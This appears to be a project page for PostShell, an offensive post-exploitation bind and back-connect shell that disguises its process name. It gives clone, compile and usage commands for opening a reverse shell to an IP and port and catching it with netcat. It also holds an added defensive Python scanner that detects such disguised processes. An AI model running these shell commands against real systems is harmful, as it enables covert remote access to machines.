PostShell is a post-exploitation shell that includes both a bind and a back-connect shell. It creates a fully interactive TTY, which allows for job control. The stub size is around 14 KB and it can be compiled on any Unix-like system.
ScreenShots
Banner and interaction with shell after a connection is started.
Why not use a traditional Backconnect/Bind Shell?
PostShell allows for easier post-exploitation by making the attacker less dependent on interpreters such as Python and Perl being present on the target.
It also incorporates both a back-connect and a bind shell, meaning that if a target doesn’t allow outgoing connections, an operator can simply start a bind shell and connect to the machine remotely.
PostShell is also significantly less suspicious than a traditional shell, because both the process name and its arguments are cloaked.
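The cloaking claim above is also the defender's handle on it: on Linux a process can rewrite its argv[0] and its comm name, but /proc/<pid>/exe still resolves to the binary that was actually executed. The following Python check, an added example that is not part of the PostShell project, flags processes whose visible name disagrees with that link; the /proc records in SAMPLES, including the PIDs and the /tmp/stub path, are constructed for illustration.

```python
import os
from dataclasses import dataclass
@dataclass
class ProcInfo:
    pid: int
    exe: str          # readlink(/proc/<pid>/exe): the binary actually executed
    comm: str         # /proc/<pid>/comm, what `ps` shows by default (max 15 chars)
    cmdline: list     # argv as seen in /proc/<pid>/cmdline

def cloaking_indicators(p: ProcInfo) -> list:
    """Return reasons the visible process identity disagrees with the binary on disk."""
    reasons = []
    deleted = p.exe.endswith(" (deleted)")
    exe_base = os.path.basename(p.exe[:-len(" (deleted)")] if deleted else p.exe)
    if deleted:
        reasons.append("executable was unlinked while still running")
    # comm is truncated to 15 bytes; compare against the truncated binary name
    if p.comm and exe_base[:15] != p.comm:
        reasons.append(f"comm {p.comm!r} != binary {exe_base!r}")
    argv0 = os.path.basename(p.cmdline[0]) if p.cmdline else ""
    if argv0 and argv0.lstrip("-") != exe_base:  # login shells prefix argv[0] with '-'
        reasons.append(f"argv[0] {argv0!r} != binary {exe_base!r}")
    return reasons  # symlinked tools (sh -> dash, busybox) also mismatch: triage, not verdict
def scan_proc(root: str = "/proc") -> dict:
    """Walk a procfs tree and return {pid: reasons} for processes worth a closer look."""
    findings = {}
    for name in os.listdir(root):
        if not name.isdigit():
            continue
        try:
            exe = os.readlink(f"{root}/{name}/exe")
            with open(f"{root}/{name}/comm") as f:
                comm = f.read().strip()
            with open(f"{root}/{name}/cmdline", "rb") as f:
                argv = [a.decode(errors="replace") for a in f.read().split(b"\0") if a]
        except OSError:
            continue  # kernel thread, exited mid-scan, or not readable by this user
        reasons = cloaking_indicators(ProcInfo(int(name), exe, comm, argv))
        if reasons:
            findings[int(name)] = reasons
    return findings

# Constructed /proc records (not real captures); PIDs and /tmp/stub are made up.
SAMPLES = [
    ProcInfo(4242, "/tmp/stub", "stub", ["./stub", "13377"]),            # undisguised bind shell
    ProcInfo(4243, "/tmp/stub", "sshd", ["/usr/sbin/sshd", "-D"]),       # comm and argv[0] rewritten
    ProcInfo(4244, "/tmp/stub (deleted)", "bash", ["-bash"]),            # binary removed after start
    ProcInfo(4245, "/usr/sbin/sshd", "sshd", ["/usr/sbin/sshd", "-D"]),  # benign daemon
]
```

Run scan_proc() as a privileged user on a live host to list mismatches; on the constructed SAMPLES, only the two disguised stub records and the unlinked one produce findings.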
Features
Getting Started
Downloading: git clone https://github.com/rek7/postshell
Compiling: cd postshell && sh compile.sh. This should create a binary called “stub”; this is the malware.
Commands
$ ./stub
Bind Shell Usage: ./stub port
Back Connect Usage: ./stub ip port
$
Example Usage
Backconnect:
$ ./stub 127.0.0.1 13377
Bind Shell:
$ ./stub 13377
Receiving a Connection with Netcat
Receiving a backconnect:
$ nc -vlp port
Connecting to a bind Shell:
$ nc host port